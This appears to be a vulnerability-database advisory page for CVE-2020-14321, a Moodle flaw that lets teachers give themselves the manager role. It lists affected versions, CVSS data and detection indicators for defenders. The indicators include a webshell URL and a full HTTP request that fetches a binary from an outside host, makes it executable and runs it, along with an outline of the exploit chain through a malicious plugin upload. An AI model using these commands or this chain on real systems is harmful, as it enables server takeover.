cbcvebase.
CVE-2020-14321
published 2022-08-16

CVE-2020-14321: In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.

PriorityP269high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
16.43%
96.6th percentile
In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.

Affected

9 ranges
VendorProductVersion rangeFixed in
moodlemoodle
moodlemoodle
moodlemoodle>= 0 < 3.5.133.5.13
moodlemoodle>= 3.5.0 < 3.5.133.5.13
moodlemoodle>= 3.6.0-beta < 3.7.73.7.7
moodlemoodle>= 3.7.0 < 3.7.73.7.7
moodlemoodle>= 3.8.0 < 3.8.43.8.4
moodlemoodle>= 3.8.0-beta < 3.8.43.8.4
moodlemoodle>= 3.9.0-beta < 3.9.13.9.1

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://10.10.94.67:9020/moodle/blocks/rce/lang/en/block_rce.php?cmd=ls
path/blocks/rce/lang/en/block_rce.php
filenameblock_rce.php
urlhttps://www.exploit-db.com/exploits/50180
urlhttps://github.com/HoangKien1020/CVE-2020-14321
url/enrol/manual/ajax.php
url/course/loginas.php
commandGET /moodle/blocks/rce/lang/en/block_rce.php?cmd=wget+10.10.132.8%3a1234/client+%26%26+chmod+%2bx+client+%26%26+./client+%26 HTTP/1.1
  • The exploit chain requires a teacher-authenticated session. Initial access vector is privilege escalation via course enrollment: teacher assigns themselves manager role using /enrol/manual/ajax.php with roletoassign=1.
  • Detect POST/GET requests to /enrol/manual/ajax.php with parameter roletoassign=1 from a teacher-level session, which indicates privilege escalation attempt.
  • Detect access to /course/loginas.php — used by the exploit to impersonate a manager account after privilege escalation.
  • Detect POST to Moodle's role definition endpoint with action=edit&roleid=1 and a large capability list — this is the manager role modification step that enables plugin installation.
  • Detect HTTP requests to /blocks/rce/lang/en/block_rce.php with a cmd= query parameter — this is the webshell dropped by the malicious plugin.
  • XSS payload injected into MoodleNet Profile field to steal teacher session cookies; monitor for script tags or Image() src exfiltration patterns in profile update requests.
  • The exploit requires a Referer header matching the Moodle base URL; requests lacking a Referer header are rejected by some configurations. Detection should account for exploit scripts that add Referer headers.
  • Post-exploitation: attacker uploads a malicious plugin (rce.zip / block_rce) via Moodle's plugin install interface. Monitor for zip file uploads to Moodle admin plugin install endpoint followed by new PHP files appearing under /blocks/.
  • ·The exploit requires the attacker to already have a teacher-level authenticated session (credentials or valid MoodleSession cookie). Unauthenticated exploitation is not possible.
  • ·The exploit depends on a manager user existing in the course or being enrollable; the attacker must know or discover the manager's user ID (default assumed 25 in the PoC).
  • ·Affected Moodle versions: 3.9 (before 3.9.1), 3.8 to 3.8.3, 3.7 to 3.7.6, 3.5 to 3.5.12 and earlier unsupported versions.
  • ·The Metasploit module notes that manual cleanup is required after exploitation: enrolled students added to the course during the attack are not automatically removed.
  • ·The PoC script is sensitive to Moodle state; prior enumeration or interaction with the Moodle instance can break the exploit flow.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
osv8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.